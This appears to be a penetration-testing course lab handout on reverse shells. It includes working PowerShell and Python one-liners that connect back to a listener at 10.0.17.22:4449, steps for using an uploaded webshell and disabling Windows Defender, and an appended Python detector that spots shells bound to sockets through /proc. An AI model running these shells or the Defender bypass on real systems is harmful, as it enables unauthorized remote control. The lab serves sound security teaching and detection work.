SEC-335: Eth. Hacking & Pen. Testing

Lab 8.2: Reverse Shell


Last updated 2 years ago

Deliverable 1. Run Wireshark, create a capture filter on 4449/tcp, and capture a command or two entered through the nc session. Provide a screenshot showing the followed TCP stream, similar to the screenshot below.

Deliverable 2. Try this out on Pippin by leveraging an uploaded webshell or reverse shell on Pippin to run a similar command that connects back to a listener. You may need to upload a small shell script to make this happen, particularly if you are using the simple-backdoor.php script. Provide a screenshot similar to the one below that shows you invoking the reverse shell on the target via curl or your web browser and catching the connection on your Kali box.

Deliverable 3. Access your Windows system on SEC335-WAN via Remmina (so that you can copy and paste). Provide a screenshot similar to the one below that shows the unsuccessful execution of PowerShell via cmd.exe, followed by the successful reverse shell after you figure out how to turn off Windows Defender.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.22',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Deliverable 4. Hit the internet and see if you can create a Python 2, Python 3 or PHP reverse shell on any of the Linux targets. Provide a screenshot similar to the one below, as well as the full text of the command used and the output of the id command run on rocky through the reverse shell.

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.22",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Source:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell
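Added example, not part of this lab or the cheatsheet it cites: the Python one-liner above works by dup2()-ing one socket onto fds 0, 1 and 2, and on Linux that leaves a visible trace under /proc/<pid>/fd. The script below checks a process's fd table for that pattern (the interpreter process matches even though the pty.spawn child gets /dev/pts fds); the two sample fd tables are constructed, and the scan of a live /proc assumes Linux with permission to read other processes' fd links.

```python
import os
import re
from typing import Dict, List

# A reverse shell built like the Python one-liner dup2()s one socket onto
# fds 0, 1 and 2. Linux exposes that through /proc/<pid>/fd, where each fd
# is a symlink and a socket reads as "socket:[<inode>]".
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")
STD_FDS = (0, 1, 2)

# Constructed fd tables (not captured from a real host) used for the demo.
REVERSE_SHELL_FDS = {0: "socket:[41283]", 1: "socket:[41283]",
                     2: "socket:[41283]", 3: "/dev/ptmx"}
INTERACTIVE_SHELL_FDS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}


def std_fds_on_socket(fd_links: Dict[int, str]) -> bool:
    """True when fd 0, 1 and 2 all point at the same socket inode."""
    targets = [fd_links.get(fd, "") for fd in STD_FDS]
    if not all(SOCKET_LINK.match(t) for t in targets):
        return False
    # One socket shared by all three fds is the dup2() signature; a service
    # that merely holds a listening socket on another fd does not match.
    return len(set(targets)) == 1


def read_fd_links(pid: int) -> Dict[int, str]:
    """Read the /proc/<pid>/fd symlinks; empty dict if unreadable."""
    fd_dir = f"/proc/{pid}/fd"
    links: Dict[int, str] = {}
    try:
        names = os.listdir(fd_dir)
    except OSError:  # process gone, not Linux, or not permitted
        return links
    for name in names:
        try:
            links[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue
    return links


def find_suspect_pids() -> List[int]:
    """Return pids whose standard fds are all bound to one socket."""
    return [int(p) for p in os.listdir("/proc")
            if p.isdigit() and std_fds_on_socket(read_fd_links(int(p)))]


if __name__ == "__main__":
    for pid in find_suspect_pids():
        print(f"pid {pid} has stdin/stdout/stderr on one socket")
```

Run it as root on the target while a reverse shell is connected and the interpreter's pid is listed; the same check is cheap enough to run from cron or an EDR hook.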